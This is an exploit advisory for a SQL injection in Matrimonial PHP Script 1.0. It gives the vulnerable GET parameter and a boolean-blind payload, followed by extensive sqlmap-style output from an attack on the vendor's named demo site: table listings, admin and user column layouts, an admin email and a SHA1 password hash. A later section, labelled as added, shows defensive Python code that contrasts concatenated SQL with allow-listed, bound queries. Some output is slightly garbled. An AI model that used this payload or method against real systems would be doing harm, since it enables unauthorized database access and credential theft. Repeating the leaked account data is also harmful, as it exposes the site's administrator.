Matrimonial PHP Script 1.0 SQL Injection

2022.08.12
Credit: CraCkEr
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

C r a C k E r
T H E   C R A C K   O F   E T E R N A L   M I G H T

From The Ashes and Dust Rises An Unimaginable crack....

[ Exploits ]

Author    : CraCkEr
Website   : uisort.com
Vendor    : Uisort Technologies Pvt. Ltd.
Software  : Matrimonial PHP Script v1.0
Demo      : stage.matrimic.in
Vuln Type : Remote SQL Injection
Method    : GET
Impact    : Database Access

Matrimonial Script PHP tailored with advanced features website & mobile apps from matrimic

B4nks-NET irc.b4nks.tk #unix

Release Notes:
═════════════
Typically used for remotely exploitable vulnerabilities that can lead to system compromise.

Greets:
Phr33k, NK, GoldenX, Wehla, Cap, ZARAGAGA, DarkCatSpace, R0ot, KnG, Centerk, loool, DevS, Dark-Gost, Carlos132sp, ProGenius, bomb, fjear, H3LLB0Y

CryptoJob (Twitter) twitter.com/CryptozJob

© CraCkEr 2022

GET parameter 'Userdetails[ud_gender]' is vulnerable

---
Parameter: Userdetails[ud_gender] (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: Userdetails[ud_gender]=1 AND 2636=2636
---

[+] Starting the Attack

[INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.0.0

[INFO] fetching current database
[INFO] retrieved: stage_db_qa

[INFO] fetching number of tables for database 'stage_db_qa'

Database: stage_db_qa
[37 tables]
+--------------------+
| YiiCache           |
| YiiLog             |
| mc_admin           |
| mc_blocklist       |
| mc_caste           |
| mc_city            |
| mc_cms             |
| mc_contact         |
| mc_contact_history |
| mc_country         |
| mc_currency        |
| mc_deleteprofile   |
| mc_education       |
| mc_feedback        |
| mc_gallery         |
| mc_height          |
| mc_horoscope       |
| mc_import_jobs     |
| mc_interest        |
| mc_language        |
| mc_message         |
| mc_occupation      |
| mc_partner         |
| mc_plan            |
| mc_profile_viewed  |
| mc_religion        |
| mc_searchlist      |
| mc_settings        |
| mc_shortlist       |
| mc_sms_history     |
| mc_state           |
| mc_subcaste        |
| mc_success_story   |
| mc_toungue         |
| mc_transaction     |
| mc_user            |
| mc_userdetails     |
+--------------------+

[INFO] fetching columns for table 'mc_admin' in database 'stage_db_qa'

Database: stage_db_qa
Table: mc_admin
[4 columns]
+--------------+-------------+
| Column       | Type        |
+--------------+-------------+
| admin_email  | varchar(32) |
| admin_id     | int(11)     |
| admin_name   | varchar(32) |
| admin_status | int(11)     |
+--------------+-------------+

[INFO] fetching number of column(s) 'admin_email,admin_id,admin_name,admin_status' entries for table 'mc_admin' in database 'stage_db_qa'

Database: stage_db_qa
Table: mc_admin
[1 entry]
+----------+-----------------------+------------+--------------+
| admin_id | admin_email           | admin_name | admin_status |
+----------+-----------------------+------------+--------------+
| 1        | admin@mat\x81imic.com | Admin      | 1            |
+----------+-----------------------+------------+--------------+

[INFO] fetching columns for table 'mc_user' in database 'stage_db_qa'

Database: stage_db_qa
Table: mc_user
[20 columns]
+------------------------+--------------+
| Column                 | Type         |
+------------------------+--------------+
| api_token              | varchar(255) |
| code                   | varchar(128) |
| device                 | varchar(32)  |
| user_activecode        | varchar(32)  |
| user_activedate        | datetime     |
| user_activestatus      | int(11)      |
| user_android_device_id | varchar(255) |
| user_email             | varchar(32)  |
| user_id                | int(11)      |
| user_ios_device_id     | varchar(255) |
| user_ipaddress         | varchar(32(  |
| user_lastlogin         | datetime     |
| user_mobile            | bigint(20)   |
| user_opensource        | varchar(32)  |
| user_password          | varchar(255) |
| user_salt              | varchar(64)  |
| user_status            | int(11)      |
| user_type              | int(11)      |
| user_userid            | int(11)      |
| user_verified_token    | varchar(255) |
+------------------------+--------------+

[INFO] fetching number of column(s) 'user_email,user_id,user_password,user_type,user_userid' entries for table 'mc_user' in database 'stage_db_qa'

Database: stage_db_qa
Table: mc_user
[1 entry]
+---------+--------------------+------------------------------------------+-----------+-------------+
| user_id | user_email         | user_password                            | user_type | user_userid |
+---------+--------------------+------------------------------------------+-----------+-------------+
| 1       | admin@matrimic.com | fa4c71db18591d0323141b39ab337b59b584b3b9 | 1         | 1           |
+---------+--------------------+------------------------------------------+-----------+-------------+

Possible Algorithms: SHA1

[-] Done
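
Added example, not part of the original advisory and not the vendor's code: a small Python/SQLite stand-in for the PHP/MySQL stack, showing why the reported value is parsed as SQL when it is concatenated into the WHERE clause, next to a hardened handler that allow-lists the value and binds it. The ud_id and ud_gender columns, the sample rows, the allowed codes and all function names are assumptions.

```python
import sqlite3

PAYLOAD = "1 AND 2636=2636"   # value reported in the advisory
ALLOWED_GENDERS = {"1", "2"}  # assumed set of valid codes for the field


def make_db():
    """Constructed sample data; ud_id, ud_gender and the rows are assumptions."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE mc_userdetails "
               "(ud_id INTEGER PRIMARY KEY, ud_gender INTEGER)")
    db.executemany("INSERT INTO mc_userdetails (ud_gender) VALUES (?)",
                   [(1,), (1,), (2,)])
    return db


def search_vulnerable(db, ud_gender):
    """Hypothetical 'before': request value concatenated into the WHERE clause."""
    sql = "SELECT ud_id FROM mc_userdetails WHERE ud_gender = " + ud_gender
    return [row[0] for row in db.execute(sql)]


def search_hardened(db, ud_gender):
    """'After': allow-list the value, then pass it as a bound parameter."""
    # Reject arrays, empty values and anything that is not a known code.
    if not isinstance(ud_gender, str) or ud_gender not in ALLOWED_GENDERS:
        raise ValueError("invalid ud_gender")
    sql = "SELECT ud_id FROM mc_userdetails WHERE ud_gender = ?"
    return [row[0] for row in db.execute(sql, (int(ud_gender),))]


def accepts_payload(search, db):
    """Regression check: True if the handler runs a query for the advisory value."""
    try:
        search(db, PAYLOAD)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    db = make_db()
    print("vulnerable rows for payload:", search_vulnerable(db, PAYLOAD))
    print("vulnerable accepts payload:", accepts_payload(search_vulnerable, db))
    print("hardened accepts payload:", accepts_payload(search_hardened, db))
```

On MySQL a bound non-numeric string is coerced to a number when compared with an integer column, so binding keeps the value out of the SQL text while the allow-list is what rejects the malformed input.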

